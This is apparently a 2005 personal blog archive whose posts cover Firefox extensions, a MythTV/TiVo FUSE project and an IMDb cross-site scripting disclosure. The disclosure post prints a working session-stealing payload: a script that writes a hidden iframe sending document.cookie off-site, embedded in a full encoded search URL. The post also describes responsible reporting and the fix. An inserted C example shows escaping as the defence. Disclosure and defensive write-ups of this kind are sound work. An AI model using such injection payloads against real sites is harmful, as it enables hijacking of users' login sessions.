  • Disable Targets For Downloads (1.0) Prevents download links opening a blank window.
  • QuickProxy (2005.12.04) Quickproxy creates a statusbar button to quickly turn the proxy on and off.
  • DownThemAll! ( The mass downloader for Firefox.
  • Web Developer (0.9.4) Adds a menu and a toolbar with various web developer tools.
  • Wayback (0.1.1) Displays an archived version of the webpage.
  • Extended Cookie Manager (0.5.5) Change the cookie status for websites on demand.

In addition, it seems the option in TabBrowserPreferences for URL pasting into the display window to load was removed. After some Googling, I was directed to the about:config page, under “middlemouse.contentLoadURL”. Set it to true to restore the prior default behavior.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 23, 2005


Filed under: Multimedia — kees @ 2:58 pm

My first working crack at getting a filesystem overlay working between MythTV, Galleon, and my TiVo is finished. If you’re brave, check it out.

© 2005 – 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 22, 2005

galleon and FUSE

Filed under: Multimedia — kees @ 9:46 pm

Every few years, I end up relearning Java for some project or another. Today, that project is Galleon, the fantastic TiVo Home Media Server. I’ve been sort of mildly involved in another person’s attempts to get MythTV and his TiVo working nicely together.

The basic situation is this: I want to be able to watch stuff I’ve recorded on my MythTV box via my TiVo. Galleon already does this.

Using the “GoBack” TiVo feature, Galleon acts like another TiVo on the network, and sends a show to the TiVo. Normally this is used to send a .TiVo file from your computer back to the TiVo. In the case of TiVo-to-TiVo communication, they include the metadata about the show (title, air date, duration, description, etc) before starting the data transfer. Galleon stores the metadata to a local database when it downloads shows via the ToGo feature.

It is possible to send any valid MPEG stream to the TiVo, but unless the Galleon database has metadata for the show, there will be nothing but the filename on the TiVo end when it transfers. In the case of MythTV shows, the metadata is contained in the MythTV database. I’m hoping to create a MythTV “application” for Galleon that will connect to the MythTV database, and populate the TiVo with the needed metadata.

Since I’m so green on Java, I’m doing something else as a “proof-of-concept”. It was suggested that some of the metadata could be encoded into the filename. This requires two halves: a parser in Galleon to extract the data, and the files to be named with their metadata encoded.

On the Galleon side, I’m digging around with the StringTokenizer, and generally getting my feet wet with the Galleon source and banging my head on the java compiler.

On the filesystem side, I’m going to use FUSE to create an overlay filesystem that queries the MythTV database, and builds a list of files based on an NFS mount’s contents. (Which I’ll NFS mount from my MythTV box.)

Mostly I just wanted to write a FUSE application. :)

© 2005 – 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 12, 2005

historical exchange rates

Filed under: General — kees @ 11:07 pm

Tonight I discovered that finding out the historical worth of money is a little tricky to calculate. :) On Poirot tonight, he bought 19 pairs of silk stockings in order to trap a thief. The clerk kept warning him that they were “very expensive”. The final bill was 35 shillings per pair. I thought it rather odd that a value not involving pounds would be considered “very expensive”. Feeling very detective-oriented, I had to investigate.

First of all, I found a nice conversion chart for British currency. 35 shillings is 1.75 pounds. The story took place in roughly 1928, but that doesn’t change the shillings calculation because even after the decimalization in 1971, shillings and pounds kept their 20-to-1 ratio.

Trying to find “current worth” of historical monies was a little more difficult. I found the How Much Is That? site, and it seems that 1.75 pounds is worth about $95 in present day. Good stockings are about $15 a pair now, and since nylon was invented in 1935, it doesn’t seem unreasonable that good stockings would be about 10 times more expensive in 1928.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

xmltv article

Filed under: Multimedia — kees @ 11:59 am

My friend Brian just had his article-writing debut on O’Reilly‘s ONLamp site. He wrote about how to use XMLTV to help manage your TV viewing schedules if you don’t have a DVR doing it for you (or not doing it well enough).

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

October 31, 2005

imdb xss

Filed under: Security,Vulnerabilities — kees @ 10:43 pm

Last week I discovered a cross-site scripting vulnerability in IMDb’s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the “to-be-displayed” location on the URL, and didn’t escape HTML entities before displaying it. I was able to steal my own cookies and log in with my IMDb account from another computer. Last Wed, I reported it:

26 Oct 2005 10:29:59 PM

It seems your service is vulnerable to cross-site scripting (XSS). Since you
have login information stored as cookies, it’s possible for people to trick
others into exposing their logins. As an example, this displays your cookies to
you in your browser:;%3Cscript%3Ealert(document.cookie)%3C/script%3E

Please let me know if you have any questions. I love using IMDb, and thought
you might want to make yourselves more secure.


At 9am today, they had fixed it:

31 Oct 2005 09:01:17 AM
Thank you for your feedback about the Internet Movie Database.

The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.

We appreciate that you took the time to share your thoughts with us. It has now been fixed.

Thank you for your support!

The IMDb Help Desk

Another success for vulnerability reporting!

As for a concrete example, the “heading” argument to their search tool was being displayed. The harmless example I used above just pops an alert dialog. To actually pass the cookies off-site where they can be collected, I used an invisible IFRAME, and pulled a content-less document from my server. To do this, I wanted the following to appear on the IMDb page:

<iframe src="" width="0" height="0" frameborder="0"></iframe>

There are a number of ways to take the browser off-site. Another is the HTTP request methods that get used in a lot of AJAX applications. I haven’t dug into using those, even though they’re way more powerful: you don’t need to “hide” the results of an IFRAME, and if you don’t listen for the HTTP results, they just never get used. It’s only the “side-effect” of recording the cookie off-site that’s wanted. Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:

document.write('<iframe src="'+document.cookie+'" width="0" height="0" frameborder="0"></iframe>')

And here it is, HTML-encoded, stuffed into the middle of the “header” argument to the search function, disguised as a search for filming locations in Vancouver, BC:,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&&heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write(‘%3Ciframe%20src=%22’%2Bdocument.cookie%2B’%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C/iframe%3E’)%3C/script%3E%20Canada

And if you click that, you can see their newly fixed entity-escaping. Again, kudos to IMDb! Additionally, it looks like they rearranged their search tool to not even use the “header” argument anymore. Neato.
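As an added example, not IMDb’s code and not from the post, here are the two halves of the fix described above, in C: a hypothetical page renderer that drops the “heading” parameter into the page raw (the shape of the bug) beside one that entity-encodes it first, the “newly fixed entity-escaping” behaviour. html_escape, the render_heading_* functions, contains_script_tag and the kPayload string are all assumptions of this example; kPayload is constructed to have the shape of the document.write injection above, with the collection URL left empty.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Replace the five characters that change meaning in HTML text and
 * attribute values. Writes at most `outsz` bytes (always NUL-terminated
 * when outsz > 0) and returns the length the full escaped string needs,
 * so a return value >= outsz tells the caller the output was truncated. */
size_t html_escape(const char *in, char *out, size_t outsz)
{
    size_t need = 0, pos = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t len = strlen(rep);
        need += len;
        if (pos + len < outsz) {          /* keep one byte for the NUL */
            memcpy(out + pos, rep, len);
            pos += len;
        }
    }
    if (outsz)
        out[pos] = '\0';
    return need;
}

/* The shape of the bug: a URL parameter pasted straight into the markup.
 * Hypothetical reconstruction, not IMDb's code. */
int render_heading_vulnerable(const char *heading, char *out, size_t outsz)
{
    return snprintf(out, outsz, "<h2>%s</h2>", heading);
}

/* Same page, with the parameter encoded for an HTML text context first.
 * Over-long input is refused (-1) rather than silently truncated. */
int render_heading_safe(const char *heading, char *out, size_t outsz)
{
    char esc[1024];
    if (html_escape(heading, esc, sizeof esc) >= sizeof esc)
        return -1;
    return snprintf(out, outsz, "<h2>%s</h2>", esc);
}

/* 1 if the rendered page still carries a live <script> tag. */
int contains_script_tag(const char *page)
{
    return strstr(page, "<script") != NULL;
}

/* 1 if escaping `in` yields exactly `expected`. */
int escape_matches(const char *in, const char *expected)
{
    char buf[256];
    size_t need = html_escape(in, buf, sizeof buf);
    return need < sizeof buf && strcmp(buf, expected) == 0;
}

/* Constructed payload in the shape of the post's injection; the server
 * URL the cookie would be sent to is deliberately left empty. */
static const char kPayload[] =
    "Vancouver,<script>document.write('<iframe src=\"'+document.cookie+'\" "
    "width=\"0\" height=\"0\" frameborder=\"0\"></iframe>')</script>";

int demo_vulnerable_leaks(void)
{
    char page[2048];
    render_heading_vulnerable(kPayload, page, sizeof page);
    return contains_script_tag(page);          /* 1: script survives */
}

int demo_safe_blocks(void)
{
    char page[2048];
    if (render_heading_safe(kPayload, page, sizeof page) < 0)
        return 0;
    /* the tag is now inert text the browser displays, not executes */
    return !contains_script_tag(page) && strstr(page, "&lt;script&gt;") != NULL;
}

int main(void)
{
    char page[2048];
    render_heading_vulnerable(kPayload, page, sizeof page);
    printf("vulnerable: %s\n", page);
    render_heading_safe(kPayload, page, sizeof page);
    printf("escaped:    %s\n", page);
    return 0;
}
```

The escaper is only right for text and double-quoted attribute contexts; a parameter that ends up inside a URL, a JavaScript string or a style block needs that context’s own encoding, which is why frameworks tie the encoder to the place the value is inserted.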

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

October 28, 2005

gcc extensions

Filed under: General — kees @ 7:30 am

Robert Love wrote up a great summary of GCC extensions. Recommended reading! This is exactly the kind of summary I’ve been hoping to run into. Maybe I can go through Inkscape adding all sorts of fun tags to functions and variables now. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
